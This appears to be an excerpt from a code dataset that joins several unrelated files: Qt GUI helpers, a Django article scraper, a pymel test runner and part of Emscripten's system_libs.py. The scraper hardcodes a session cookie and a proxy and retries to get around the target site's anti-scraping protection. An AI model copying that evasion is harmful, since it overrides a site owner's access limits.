if final_stretch:
layout.addStretch()
def setText(self, text):
self.label.setText(text)
def setIcon(self, icon):
self.icon.setPixmap(icon.pixmap(self.IconSize))
self.icon.repaint() # macOS hack for #6269
def get_default_language():
name = QLocale.system().name()
return name if name in languages else 'en_UK'
def char_width_in_lineedit() -> int:
char_width = QFontMetrics(QLineEdit().font()).averageCharWidth()
# 'averageCharWidth' seems to underestimate on Windows, hence 'max()'
return max(9, char_width)
def webopen(url: str):
if sys.platform == 'linux' and os.environ.get('APPIMAGE'):
# When on Linux webbrowser.open can fail in AppImage because it can't find the correct libdbus.
# We just fork the process and unset LD_LIBRARY_PATH before opening the URL.
# See #5425
if os.fork() == 0:
del os.environ['LD_LIBRARY_PATH']
webbrowser.open(url)
os._exit(0)
else:
webbrowser.open(url)
class FixedAspectRatioLayout(QLayout):
def __init__(self, parent: QWidget = None, aspect_ratio: float = 1.0):
super().__init__(parent)
self.aspect_ratio = aspect_ratio
self.items: List[QLayoutItem] = []
def set_aspect_ratio(self, aspect_ratio: float = 1.0):
self.aspect_ratio = aspect_ratio
self.update()
def addItem(self, item: QLayoutItem):
self.items.append(item)
def count(self) -> int:
return len(self.items)
def itemAt(self, index: int) -> QLayoutItem:
if index >= len(self.items):
return None
return self.items[index]
def takeAt(self, index: int) -> QLayoutItem:
if index >= len(self.items):
return None
return self.items.pop(index)
def _get_contents_margins_size(self) -> QSize:
margins = self.contentsMargins()
return QSize(margins.left() + margins.right(), margins.top() + margins.bottom())
def setGeometry(self, rect: QRect):
super().setGeometry(rect)
if not self.items:
return
contents = self.contentsRect()
if contents.height() > 0:
c_aratio = contents.width() / contents.height()
else:
c_aratio = 1
s_aratio = self.aspect_ratio
item_rect = QRect(QPoint(0, 0), QSize(
contents.width() if c_aratio < s_aratio else contents.height() * s_aratio,
contents.height() if c_aratio > s_aratio else contents.width() / s_aratio
))
content_margins = self.contentsMargins()
free_space = contents.size() - item_rect.size()
for item in self.items:
if free_space.width() > 0 and not item.alignment() & Qt.AlignLeft:
if item.alignment() & Qt.AlignRight:
item_rect.moveRight(contents.width() + content_margins.right())
else:
item_rect.moveLeft(content_margins.left() + (free_space.width() / 2))
else:
item_rect.moveLeft(content_margins.left())
if free_space.height() > 0 and not item.alignment() & Qt.AlignTop:
if item.alignment() & Qt.AlignBottom:
item_rect.moveBottom(contents.height() + content_margins.bottom())
else:
item_rect.moveTop(content_margins.top() + (free_space.height() / 2))
else:
item_rect.moveTop(content_margins.top())
item.widget().setGeometry(item_rect)
def sizeHint(self) -> QSize:
result = QSize()
for item in self.items:
result = result.expandedTo(item.sizeHint())
return self._get_contents_margins_size() + result
def minimumSize(self) -> QSize:
result = QSize()
for item in self.items:
result = result.expandedTo(item.minimumSize())
return self._get_contents_margins_size() + result
def expandingDirections(self) -> Qt.Orientations:
return Qt.Horizontal | Qt.Vertical
def QColorLerp(a: QColor, b: QColor, t: float):
"""
Blends two QColors. t=0 returns a. t=1 returns b. t=0.5 returns evenly mixed.
"""
t = max(min(t, 1.0), 0.0)
i_t = 1.0 - t
return QColor(
(a.red() * i_t) + (b.red() * t),
(a.green() * i_t) + (b.green() * t),
(a.blue() * i_t) + (b.blue() * t),
(a.alpha() * i_t) + (b.alpha() * t),
)
class ImageGraphicsEffect(QObject):
"""
Applies a QGraphicsEffect to a QImage
"""
def __init__(self, parent: QObject, effect: QGraphicsEffect):
super().__init__(parent)
assert effect, 'effect must be set'
self.effect = effect
self.graphics_scene = QGraphicsScene()
self.graphics_item = QGraphicsPixmapItem()
self.graphics_item.setGraphicsEffect(effect)
self.graphics_scene.addItem(self.graphics_item)
def apply(self, image: QImage):
assert image, 'image must be set'
result = QImage(image.size(), QImage.Format_ARGB32)
result.fill(Qt.transparent)
painter = QPainter(result)
self.graphics_item.setPixmap(QPixmap.fromImage(image))
self.graphics_scene.render(painter)
self.graphics_item.setPixmap(QPixmap())
return result
if __name__ == "__main__":
app = QApplication([])
t = WaitingDialog(None, 'testing ...', lambda: [time.sleep(1)], lambda x: QMessageBox.information(None, 'done', "done"))
t.start()
app.exec_()
|
[] |
[] |
[
"APPIMAGE",
"LD_LIBRARY_PATH"
] |
[]
|
["APPIMAGE", "LD_LIBRARY_PATH"]
|
python
| 2 | 0 | |
db_tools/gen_readings.py
|
"""爬取网络上的英文文章,保存到数据库"""
import sys
import os
import requests
import re
from bs4 import BeautifulSoup
import time
import random
from db_tools.gen_reading_ids import FILE_STORAGE
# Put the directory containing this file on the path so the Django project can be found
pwd = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(pwd, ".."))
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "CET6Cat.settings")
# Initialize the Django environment
import django
django.setup()
# Django models must be imported after django.setup(); this import cannot sit at the top of the file
from readings.models import Reading
"""
www.enread.com
Goal: crawl the English articles published on this site
"""
# Request headers and proxy pool; when requests stop working, refresh the Cookie, Referer and proxy
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36',
'Cookie': 'yunsuo_session_verify=47caaea7006b66b3027c74b4aff09465; security_session_mid_verify=0fb499be8d029a761e051487fdd708f1; bdshare_firstime=1555141583186; Hm_lvt_8e0a0ac35ad5727d6e32afe2a02616e9=1555125825,1555139354,1555159765; __51cke__=; Hm_lpvt_8e0a0ac35ad5727d6e32afe2a02616e9=1555159775; __tins__1636281=%7B%22sid%22%3A%201555159765267%2C%20%22vd%22%3A%203%2C%20%22expires%22%3A%201555161574622%7D; __51laig__=3',
'Referer': 'http://www.enread.com/essays/index.html',
# 'Upgrade-Insecure-Requests': '1',
# 'Connection': 'keep - alive'
}
proxies = {
# 'http': 'http://110.52.235.61:9999',
'https': 'https://219.138.47.221:9999'
}
def strip(s):
return s.strip()
# Read the article ids (eids) to crawl
with open(FILE_STORAGE, 'r') as f:
eids = map(strip, f.readlines())
# Records the indexes that failed to crawl
fail = []
for index, eid in enumerate(eids):
if index <= 34: # resume point: the previous run already crawled up to here
continue
url = "http://www.enread.com/essays/" + eid + ".html"
article = head = None
max_cnt = 4 # maximum number of attempts for one page
# The site has scraping protection; if the response comes back empty, retry a few times
while (not head or not article) and max_cnt > 0:
response = requests.get(url, headers=headers, proxies=proxies)
soup = BeautifulSoup(response.text, 'lxml')
head = soup.select(
'#wenzhangziti > table > tbody > tr:nth-of-type(1) > td > table > tbody > tr:nth-of-type(1) > td > div > font')
article = soup.select('#dede_content > div')
max_cnt -= 1
time.sleep(random.uniform(1.5, 2.5))
if (not head) or len(head) == 0:
print("{}=>{}获取失败".format(index, eid))
fail.append(index)
else:
# Clean up the title
head = re.sub(r'</{0,1}\w.*?>', "", str(head[0]))
with open("../media/readings/" + eid, 'w', encoding='utf8') as f:
# Process the article paragraph by paragraph and write it to a file
for d in article:
# Match HTML tags and replace them with an empty string to remove them
d = re.sub(r'(<a href="#_w_\d+">\d+</a>)|(</{0,1}\w.*?>)', "", str(d))
# Strip leading/trailing whitespace (there may be a lot of it)
d = d.strip()
if len(d) > 0:
f.write(d)
f.write("\n\n")
# Persist to the database
reading = Reading()
reading.name = head[:30]
reading.content = "readings/" + eid
reading.source_id = 4
reading.save()
print("[写入]{}=>{}".format(index, eid) + "=>" + head)
print(fail)
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
tests/pymel_test.py
|
#!/usr/bin/env mayapy
#nosetests --with-doctest -v pymel --exclude '(windows)|(tools)|(arrays)|(example1)'
#import doctest
from __future__ import with_statement
import sys, platform, os, shutil, time, inspect, tempfile, doctest, re
# tee class adapted from http://shallowsky.com/blog/programming/python-tee.html
class Tee(object):
def __init__(self, _fd1, _fd2) :
self.fd1 = _fd1
self.fd2 = _fd2
def __del__(self) :
self.close()
def close(self):
for toClose in (self.fd1, self.fd2):
if toClose not in (sys.stdout, sys.stderr,
sys.__stdout__, sys.__stderr__, None):
toClose.close()
self.fd1 = self.fd2 = None
def write(self, text) :
self.fd1.write(text)
self.fd2.write(text)
def flush(self) :
self.fd1.flush()
self.fd2.flush()
#stderrsav = sys.stderr
#outputlog = open(logfilename, "w")
#sys.stderr = tee(stderrsav, outputlog)
try:
import nose
except ImportError, e:
print "To run pymel's tests you must have nose installed: http://code.google.com/p/python-nose"
raise e
# Get the 'new' version of unittest
if sys.version_info >= (2, 7, 0):
import unittest
else:
import unittest2 as unittest
import argparse
def getParser():
testsDir = os.path.dirname(os.path.abspath(sys.argv[0]))
pymelRoot = os.path.dirname( testsDir )
parser = argparse.ArgumentParser(description='Run the pymel tests')
parser.add_argument('extra_args', nargs='*', help='args to pass to nose or unit/unit2')
parser.add_argument('--app-dir', help='''make the tests use the given dir as
the MAYA_APP_DIR (ie, the base maya settings folder)''')
#parser.add_argument('--test', help='''specific TestCase or test function to
#run; if given, will be run using the "new" unittest"''')
parser.add_argument('--tests-dir', help='''The directory that contains the test modules''',
default=testsDir)
parser.add_argument('--pymel-root', help='''The directory that contains the test modules''',
default=pymelRoot)
return parser
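# Matches dotted Python names such as package.module.TestCase.test_method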
_PYTHON_DOT_NAME_RE = re.compile(r'[A-Za-z_][A-Za-z_0-9]*(\.[A-Za-z_][A-Za-z_0-9]*)+')
def isPythonDottedName(name):
return bool(_PYTHON_DOT_NAME_RE.match(name))
def moduleObjNameSplit(moduleName):
'''Returns the name split into the module part and the object name part
'''
import imp
currentPath = None
split = moduleName.split('.')
moduleParts = []
for name in split:
try:
currentPath = [imp.find_module(name, currentPath)[1]]
except ImportError:
break
moduleParts.append(name)
return '.'.join(moduleParts), '.'.join(split[len(moduleParts):])
def nose_test(argv, module=None, pymelDir=None):
"""
Run pymel unittests / doctests
"""
arg0 = argv[0]
extraArgs = argv[1:]
if pymelDir:
os.chdir(pymelDir)
os.environ['MAYA_PSEUDOTRANS_MODE']='5'
os.environ['MAYA_PSEUDOTRANS_VALUE']=','
noseKwArgs={}
noseArgv = "dummyArg0 --with-doctest -vv".split()
if module is None:
#module = 'pymel' # if you don't set a module, nose will search the cwd
excludes = r'''^windows
\Wall\.py$
^tools
^example1
^testing
^eclipseDebug
^pmcmds
^testPa
^maya
^maintenance
^pymel_test
^TestPymel
^testPassContribution$'''.split()
# default inGui to false - if we are in gui, we should be able to query
# (definitively) that we are, but same may not be true from command line
inGui = False
try:
import maya.cmds
inGui = not maya.cmds.about(batch=1)
except Exception: pass
# if we're not in gui mode, disable the gui tests
if not inGui:
excludes.extend('^test_uitypes ^test_windows'.split())
noseArgv += ['--exclude', '|'.join( [ '(%s)' % x for x in excludes ] ) ]
if inspect.ismodule(module):
noseKwArgs['module']=module
elif module:
noseArgv.append(module)
if extraArgs is not None:
noseArgv.extend(extraArgs)
noseKwArgs['argv'] = noseArgv
with DocTestPatcher():
print "running nose:", noseKwArgs
nose.main( **noseKwArgs)
def unit2_test(argv, **kwargs):
# insert the verbose flag
argv[1:1] = ['--verbose']
kwargs['module'] = None
kwargs['argv'] = argv
if sys.version_info < (2, 7, 0):
# if we try to specify a specific method, unittest2 checks to see if it
# is an unbound method on a unittest2.TestCase; if it is on a
# unittest.TestCase, it will not work; therefore, install unittest2 as
# unittest
sys.modules['unittest'] = sys.modules['unittest2']
print "running unittest:", kwargs
unittest.main(**kwargs)
class DocTestPatcher(object):
"""
When finding docstrings from a module, DocTestFinder does a test to ensure that objects
in the namespace are actually from that module. Unfortunately, our LazyLoadModule causes
some problems with this. Eventually, we may experiment with setting the LazyLoadModule
and original module's dict's to be the same... for now, we use this class to override
DocTestFinder._from_module to return the results we want.
Also, the doctest will override the 'wantFile' setting for ANY .py file,
even if it matches the 'exclude' - it does this so that it can search all
python files for docs to add to the doctests.
Unfortunately, if some modules are simply loaded, they can affect things -
ie, if pymel.all is loaded, it will trigger the lazy-loading of all class
objects, which will make our lazy-loading tests fail.
To get around this, override the Doctest plugin object's wantFile to also
exclude the 'excludes'.
"""
def __enter__(self):
self.set_from_module()
self.set_wantFile()
def set_from_module(self):
self.orig_from_module = doctest.DocTestFinder.__dict__['_from_module']
def _from_module(docTestFinder_self, module, object):
"""
Return true if the given object is defined in the given
module.
"""
# We only have problems with functions...
if inspect.isfunction(object):
if 'LazyLoad' in module.__class__.__name__:
if module.__name__ == object.__module__:
return True
return self.orig_from_module(docTestFinder_self, module, object)
doctest.DocTestFinder._from_module = _from_module
def set_wantFile(self):
import nose
# if nose.__versioninfo__ > (1,0,0):
# self.orig_wantFile = None
# return
import nose.plugins.doctests
self.orig_wantFile = nose.plugins.doctests.Doctest.__dict__['wantFile']
def wantFile(self, file):
"""Override to select all modules and any file ending with
configured doctest extension.
"""
# Check if it's a desired file type
if ( (file.endswith('.py') or (self.extension
and anyp(file.endswith, self.extension)) )
# ...and that it isn't excluded
and (not self.conf.exclude
or not filter(None,
[exc.search(file)
for exc in self.conf.exclude]))):
return True
return None
nose.plugins.doctests.Doctest.wantFile = wantFile
def __exit__(self, *args, **kwargs):
doctest.DocTestFinder._from_module = self.orig_from_module
if self.orig_wantFile is not None:
import nose.plugins.doctests
nose.plugins.doctests.Doctest.wantFile = self.orig_wantFile
def main(argv):
parser = getParser()
parsed = parser.parse_args(argv[1:])
if parsed.app_dir:
if not os.path.exists(parsed.app_dir):
os.makedirs(parsed.app_dir)
os.environ['MAYA_APP_DIR'] = parsed.app_dir
testsDir = parsed.tests_dir
pymelRoot = parsed.pymel_root
pypath = os.environ.get('PYTHONPATH', '').split(os.pathsep)
# add the test dir to the python path - that way,
# we can do 'pymel_test test_general' in order to run just the tests
# in test_general
sys.path.append(testsDir)
pypath.append(testsDir)
# ...and add this copy of pymel to the python path, highest priority,
# to make sure it overrides any 'builtin' pymel/maya packages
sys.path.insert(0, pymelRoot)
pypath.insert(0, pymelRoot)
os.environ['PYTHONPATH'] = os.pathsep.join(pypath)
oldPath = os.getcwd()
# make sure our cwd is the pymel project working directory
os.chdir( pymelRoot )
try:
# Try to guess whether we were given an arg which is a TestCase or
# test method/function, and if so, run new unittest (because it can
# easily handle specific TestCase/method/function)... else run nose
# (because it's what the test suite was originally set up to use)
useNose = True
if parsed.extra_args:
name = parsed.extra_args[-1]
if isPythonDottedName(name):
modulePart, objPart = moduleObjNameSplit(name)
if modulePart and objPart:
useNose = False
argv = [argv[0]] + parsed.extra_args
if useNose:
nose_test(argv)
else:
unit2_test(argv)
finally:
os.chdir(oldPath)
if __name__ == '__main__':
main(sys.argv)
|
[] |
[] |
[
"MAYA_APP_DIR",
"MAYA_PSEUDOTRANS_VALUE",
"MAYA_PSEUDOTRANS_MODE",
"PYTHONPATH"
] |
[]
|
["MAYA_APP_DIR", "MAYA_PSEUDOTRANS_VALUE", "MAYA_PSEUDOTRANS_MODE", "PYTHONPATH"]
|
python
| 4 | 0 | |
tools/system_libs.py
|
# Copyright 2014 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import glob
import hashlib
import itertools
import json
import logging
import os
import re
import shutil
import sys
import tarfile
import zipfile
from glob import iglob
from . import shared
from tools.shared import mangle_c_symbol_name, demangle_c_symbol_name
try:
from . import ports
# it's ok if the ports dir exists but is empty: then there are no ports
if not hasattr(ports, 'ports'):
ports.ports = []
except ImportError:
# it's ok if the ports dir doesn't exist: then there are no ports
class NoPorts:
ports = []
ports = NoPorts()
stdout = None
stderr = None
logger = logging.getLogger('system_libs')
LIBC_SOCKETS = ['socket.c', 'socketpair.c', 'shutdown.c', 'bind.c', 'connect.c',
'listen.c', 'accept.c', 'getsockname.c', 'getpeername.c', 'send.c',
'recv.c', 'sendto.c', 'recvfrom.c', 'sendmsg.c', 'recvmsg.c',
'getsockopt.c', 'setsockopt.c', 'freeaddrinfo.c']
def files_in_path(path_components, filenames):
srcdir = shared.path_from_root(*path_components)
return [os.path.join(srcdir, f) for f in filenames]
def glob_in_path(path_components, glob_pattern, excludes=()):
srcdir = shared.path_from_root(*path_components)
return [f for f in iglob(os.path.join(srcdir, glob_pattern)) if os.path.basename(f) not in excludes]
def get_all_files_under(dirname):
for path, subdirs, files in os.walk(dirname):
for name in files:
yield os.path.join(path, name)
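# Returns True when the newest file under dir_b is more recent than the newest file under dir_a.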
def dir_is_newer(dir_a, dir_b):
assert os.path.exists(dir_a)
assert os.path.exists(dir_b)
newest_a = max([os.path.getmtime(x) for x in get_all_files_under(dir_a)])
newest_b = max([os.path.getmtime(x) for x in get_all_files_under(dir_b)])
return newest_a < newest_b
def get_cflags(force_object_files=False):
flags = []
if shared.Settings.WASM_BACKEND:
if shared.Settings.LTO and not force_object_files:
flags += ['-flto=' + shared.Settings.LTO]
if shared.Settings.RELOCATABLE:
flags += ['-s', 'RELOCATABLE']
return flags
def run_one_command(cmd):
# Helper function used by run_build_commands.
if shared.EM_BUILD_VERBOSE:
print(' '.join(cmd))
# building system libraries and ports should be hermetic in that it is not
# affected by things like EMMAKEN_CFLAGS which the user may have set
safe_env = os.environ.copy()
for opt in ['EMMAKEN_CFLAGS']:
if opt in safe_env:
del safe_env[opt]
shared.run_process(cmd, stdout=stdout, stderr=stderr, env=safe_env)
def run_build_commands(commands):
cores = min(len(commands), shared.Building.get_num_cores())
if cores <= 1:
for command in commands:
run_one_command(command)
else:
pool = shared.Building.get_multiprocessing_pool()
# https://stackoverflow.com/questions/1408356/keyboard-interrupts-with-pythons-multiprocessing-pool
# https://bugs.python.org/issue8296
# 999999 seconds (about 11 days) is reasonably huge to not trigger actual timeout
# and is smaller than the maximum timeout value 4294967.0 for Python 3 on Windows (threading.TIMEOUT_MAX)
pool.map_async(run_one_command, commands, chunksize=1).get(999999)
def static_library_ext():
return '.a' if shared.Settings.WASM_BACKEND else '.bc'
def create_lib(libname, inputs):
"""Create a library from a set of input objects."""
suffix = os.path.splitext(libname)[1]
if suffix in ('.bc', '.o'):
if len(inputs) == 1:
shutil.copyfile(inputs[0], libname)
else:
shared.Building.link_to_object(inputs, libname)
elif suffix == '.a':
shared.Building.emar('cr', libname, inputs)
else:
raise Exception('unknown suffix ' + libname)
def read_symbols(path):
with open(path) as f:
content = f.read()
# Require that Windows newlines are not present in a symbols file when running on Linux or macOS.
# This kind of mismatch can occur if one copies a zip file of Emscripten cloned on Windows over to
# a Linux or macOS system. It will result in the Emscripten linker getting confused on stray \r characters,
# and being unable to link any library symbols properly. We could harden against this by .strip()ping the
# opened files, but it is possible that the mismatching line endings can cause random problems elsewhere
# in the toolchain, hence abort execution if so.
if os.name != 'nt' and '\r\n' in content:
raise Exception('Windows newlines \\r\\n detected in symbols file "' + path + '"! This could happen for example when copying Emscripten checkout from Windows to Linux or macOS. Please use Unix line endings on checkouts of Emscripten on Linux and macOS!')
return shared.Building.parse_symbols(content).defs
def get_wasm_libc_rt_files():
# Static linking is tricky with LLVM, since e.g. memset might not be used
# from libc, but be used as an intrinsic, and codegen will generate a libc
# call from that intrinsic *after* static linking would have thought it is
# all in there. In asm.js this is not an issue as we do JS linking anyhow,
# and have asm.js-optimized versions of all the LLVM intrinsics. But for
# wasm, we need a better solution. For now, make another archive that gets
# included at the same time as compiler-rt.
# Note that this also includes things that may be depended on by those
# functions - fmin uses signbit, for example, so signbit must be here (so if
# fmin is added by codegen, it will have all it needs).
math_files = files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'math'],
filenames=[
'fmin.c', 'fminf.c', 'fminl.c',
'fmax.c', 'fmaxf.c', 'fmaxl.c',
'fmod.c', 'fmodf.c', 'fmodl.c',
'log2.c', 'log2f.c', 'log10.c', 'log10f.c',
'exp2.c', 'exp2f.c', 'exp10.c', 'exp10f.c',
'scalbn.c', '__fpclassifyl.c',
'__signbitl.c', '__signbitf.c', '__signbit.c'
])
other_files = files_in_path(
path_components=['system', 'lib', 'libc'],
filenames=['emscripten_memcpy.c', 'emscripten_memset.c',
'emscripten_memmove.c'])
# Calls to iprintf can be generated during codegen. Ideally we wouldn't
# compile these with -O2 like we do the rest of compiler-rt, since it's
# probably not performance sensitive. However we don't currently have
# a way to set per-file compiler flags. And hopefully we should be able
# to move all this stuff back into libc once we make it LTO compatible.
iprintf_files = files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'stdio'],
filenames=['__towrite.c', '__overflow.c', 'fwrite.c', 'fputs.c',
'printf.c', 'puts.c', '__lockfile.c'])
iprintf_files += files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'string'],
filenames=['strlen.c'])
return math_files + other_files + iprintf_files
class Library(object):
"""
`Library` is the base class of all system libraries.
There are two types of libraries: abstract and concrete.
* An abstract library, e.g. MTLibrary, is a subclass of `Library` that
implements certain behaviour common to multiple libraries. The features
of multiple abstract libraries can be used through multiple inheritance.
* A concrete library, e.g. libc, is a subclass of `Library` that describes
how to build a particular library, and its properties, such as name and
dependencies.
This library system is meant to handle having many versions of the same library,
which we call *variations*. For example, some libraries (those that inherit
from MTLibrary), have both single-threaded and multi-threaded versions.
An instance of a `Library` subclass represents a specific variation of the
library. Instance methods perform operations relating to this variation.
For example, `get_cflags()` would return the emcc flags needed to build this
variation, and `build()` would generate the library file for this variation.
The constructor takes keyword arguments that define the variation.
Class methods perform tasks relating to all variations. For example,
`variations()` returns a list of all variations that exist for this library,
and `get_default_variation()` returns the variation suitable for the current
environment.
Other class methods act upon a group of libraries. For example,
`Library.get_all_variations()` returns a mapping of all variations of
existing libraries.
To add a new type of variation, you must add a parameter to `__init__` that
selects the variant. Then, override one of `vary_on` or `variations`, as well
as `get_default_variation`.
If the parameter is boolean, overriding `vary_on` to add the parameter name
to the returned list is sufficient:
@classmethod
def vary_on(cls):
return super().vary_on() + ['my_parameter']
Otherwise, you must override `variations`:
@classmethod
def variations(cls):
return [{'my_parameter': value, **other} for value, other in
itertools.product([1, 2, 3], super().variations())]
Overriding either `vary_on` or `variations` allows `embuilder.py` to know all
possible variations so it can build all of them.
You then need to modify `get_default_variation` to detect the correct value
for your new parameter based on the settings:
@classmethod
def get_default_variation(cls, **kwargs):
return super().get_default_variation(my_parameter=shared.Settings.MY_PARAMETER, **kwargs)
This allows the correct variation of the library to be selected when building
code with Emscripten.
"""
# The simple name of the library. When linking, this is the name to use to
# automatically get the correct version of the library.
# This should only be overridden in a concrete library class, e.g. libc,
# and left as None in an abstract library class, e.g. MTLibrary.
name = None
# A list of simple names of other libraries that this one depends on.
# For dynamic values, override `get_depends()` instead.
depends = []
# A set of symbols that this library exports. This will be set with a set
# returned by `read_symbols`.
symbols = set()
# A list of symbols that must be exported to keep the JavaScript
# dependencies of this library working.
js_depends = []
# Set to true to prevent EMCC_FORCE_STDLIBS from linking this library.
never_force = False
# The C compile executable to use. You can override this to shared.EMXX for C++.
emcc = shared.EMCC
# A list of flags to pass to emcc.
# The flags for the parent class is automatically inherited.
cflags = ['-Werror']
# A list of directories to put in the include path when building.
# This is a list of tuples of path components.
# For example, to put system/lib/a and system/lib/b under the emscripten
# directory into the include path, you would write:
# includes = [('system', 'lib', 'a'), ('system', 'lib', 'b')]
# The include path of the parent class is automatically inherited.
includes = []
# By default, `get_files` looks for source files for this library under `src_dir`.
# It will either use the files listed in `src_files`, or use the glob pattern in
# `src_glob`. You may not specify both `src_files` and `src_glob`.
# When using `src_glob`, you can specify a list of files in `src_glob_exclude`
# to be excluded from the library.
# Alternatively, you can override `get_files` to use your own logic.
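# As a rough illustration (hypothetical paths, sketch only): a library built
# from every .c file under system/lib/foo except bar.c could declare
#   src_dir = ['system', 'lib', 'foo']
#   src_glob = '*.c'
#   src_glob_exclude = ['bar.c']
# Concrete uses of this pattern appear below, e.g. libgl and libhtml5.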
src_dir = None
src_files = None
src_glob = None
src_glob_exclude = None
# Whether to always generate WASM object files, even when LTO is set
force_object_files = False
def __init__(self):
"""
Creates a variation of this library.
A variation is a specific combination of settings a library can have.
For example, libc++-mt-noexcept is a variation of libc++.
There might be only one variation of a library.
The constructor keyword arguments will define what variation to use.
Use the `variations` classmethod to get the list of all possible constructor
arguments for this library.
Use the `get_default_variation` classmethod to construct the variation
suitable for the current invocation of emscripten.
"""
if not self.name:
raise NotImplementedError('Cannot instantiate an abstract library')
# Read the .symbols file if it exists. This first tries to read a symbols file
# with the same basename as the library file name (e.g.
# libc++-mt.symbols), and if there isn't one, it tries to read the 'default'
# symbols file, which does not have any optional suffixes (e.g.
# libc++.symbols).
basename = os.path.splitext(self.get_filename())[0]
if shared.Settings.WASM_BACKEND:
symbols_dir = shared.path_from_root('system', 'lib', 'symbols', 'wasm')
else:
symbols_dir = shared.path_from_root('system', 'lib', 'symbols', 'asmjs')
symbols_file = os.path.join(symbols_dir, basename + '.symbols')
default_symbols_file = os.path.join(symbols_dir, self.name + '.symbols')
if os.path.isfile(symbols_file):
self.symbols = read_symbols(symbols_file)
elif os.path.isfile(default_symbols_file):
self.symbols = read_symbols(default_symbols_file)
def in_temp(self, *args):
"""Gets the path of a file in our temporary directory."""
return os.path.join(shared.get_emscripten_temp_dir(), *args)
def can_use(self):
"""
Whether this library can be used in the current environment.
For example, libmalloc would override this and return False
if the user requested no malloc.
"""
return True
def can_build(self):
"""
Whether this library can be built in the current environment.
Override this if, for example, the library can only be built on WASM backend.
"""
return True
def erase(self):
shared.Cache.erase_file(self.get_filename())
def get_path(self):
"""
Gets the cached path of this library.
This will trigger a build if this library is not in the cache.
"""
return shared.Cache.get(self.get_filename(), self.build)
def get_files(self):
"""
Gets a list of source files for this library.
Typically, you will use `src_dir`, `src_files`, `src_glob` and `src_glob_exclude`.
If those are insufficient to describe the files needed, you can override this method.
"""
if self.src_dir:
if self.src_files and self.src_glob:
raise Exception('Cannot use src_files and src_glob together')
if self.src_files:
return files_in_path(self.src_dir, self.src_files)
elif self.src_glob:
return glob_in_path(self.src_dir, self.src_glob, self.src_glob_exclude or ())
raise NotImplementedError()
def build_objects(self):
"""
Returns a list of compiled object files for this library.
By default, this builds all the source files returned by `self.get_files()`,
with the `cflags` returned by `self.get_cflags()`.
"""
commands = []
objects = []
cflags = self.get_cflags()
for src in self.get_files():
o = self.in_temp(os.path.basename(src) + '.o')
commands.append([shared.PYTHON, self.emcc, '-c', src, '-o', o] + cflags)
objects.append(o)
run_build_commands(commands)
return objects
def build(self):
"""Builds the library and returns the path to the file."""
out_filename = self.in_temp(self.get_filename())
create_lib(out_filename, self.build_objects())
return out_filename
@classmethod
def _inherit_list(cls, attr):
# Some properties, like cflags and includes, make more sense to inherit
# via concatenation than replacement.
result = []
for item in cls.__mro__[::-1]:
# Using __dict__ to avoid inheritance
result += item.__dict__.get(attr, [])
return result
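# For example, a hypothetical direct subclass of Library that declares
# cflags = ['-Oz'] ends up with the inherited list ['-Werror', '-Oz'] here
# (base classes first, most-derived class last), rather than its own list
# replacing the base class value.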
def get_cflags(self):
"""
Returns the list of flags to pass to emcc when building this variation
of the library.
Override and add any flags as needed to handle new variations.
"""
cflags = self._inherit_list('cflags')
cflags += get_cflags(force_object_files=self.force_object_files)
if self.includes:
cflags += ['-I' + shared.path_from_root(*path) for path in self._inherit_list('includes')]
return cflags
def get_base_name_prefix(self):
"""
Returns the base name of the library without any suffixes.
"""
return self.name
def get_base_name(self):
"""
Returns the base name of the library file.
This will include suffixes such as -mt, but will not include a file extension.
"""
return self.get_base_name_prefix()
def get_ext(self):
"""
Return the appropriate file extension for this library.
"""
return static_library_ext()
def get_filename(self):
"""
Return the full name of the library file, including the file extension.
"""
return self.get_base_name() + self.get_ext()
def get_depends(self):
"""
Return a list of simple names of libraries that this library depends on.
This is the dynamic version of `depends`.
"""
return self.depends
@classmethod
def vary_on(cls):
"""
Returns a list of strings that are the names of boolean constructor
arguments that define the variations of this library.
This is used by the default implementation of `cls.variations()` to generate
every possible combination of boolean values to pass to these arguments.
"""
return []
@classmethod
def variations(cls):
"""
Returns a list of keyword arguments to pass to the constructor to create
every possible variation of this library.
By default, this is every possible combination of boolean values to pass
to the list of arguments returned by `vary_on`, but you can override
the behaviour.
"""
vary_on = cls.vary_on()
return [dict(zip(vary_on, toggles)) for toggles in
itertools.product([False, True], repeat=len(vary_on))]
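# A small worked example of the product above: with vary_on() returning
# ['is_mt', 'is_asan'], this yields
# [{'is_mt': False, 'is_asan': False}, {'is_mt': False, 'is_asan': True},
#  {'is_mt': True, 'is_asan': False}, {'is_mt': True, 'is_asan': True}].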
@classmethod
def get_default_variation(cls, **kwargs):
"""
Construct the variation suitable for the current invocation of emscripten.
Subclasses should pass the keyword arguments they introduce to the
superclass version, and propagate **kwargs. The base class collects
all the keyword arguments and creates the instance.
"""
return cls(**kwargs)
@classmethod
def get_inheritance_tree(cls):
"""Returns all the classes in the inheritance tree of the current class."""
yield cls
for subclass in cls.__subclasses__():
for subclass in subclass.get_inheritance_tree():
yield subclass
@classmethod
def get_all_variations(cls):
"""
Gets all the variations of libraries in the inheritance tree of the current
library.
Calling Library.get_all_variations() returns the variations of ALL libraries
that can be built as a dictionary of variation names to Library objects.
"""
result = {}
for library in cls.get_inheritance_tree():
if library.name:
for flags in library.variations():
variation = library(**flags)
if variation.can_build():
result[variation.get_base_name()] = variation
return result
@classmethod
def get_usable_variations(cls):
"""
Gets all libraries suitable for the current invocation of emscripten.
This returns a dictionary of simple names to Library objects.
"""
result = {}
for subclass in cls.get_inheritance_tree():
if subclass.name:
library = subclass.get_default_variation()
if library.can_build() and library.can_use():
result[subclass.name] = library
return result
class MTLibrary(Library):
def __init__(self, **kwargs):
self.is_mt = kwargs.pop('is_mt')
super(MTLibrary, self).__init__(**kwargs)
def get_cflags(self):
cflags = super(MTLibrary, self).get_cflags()
if self.is_mt:
cflags += ['-s', 'USE_PTHREADS=1', '-DUSE_THREADS']
return cflags
def get_base_name(self):
name = super(MTLibrary, self).get_base_name()
if self.is_mt:
name += '-mt'
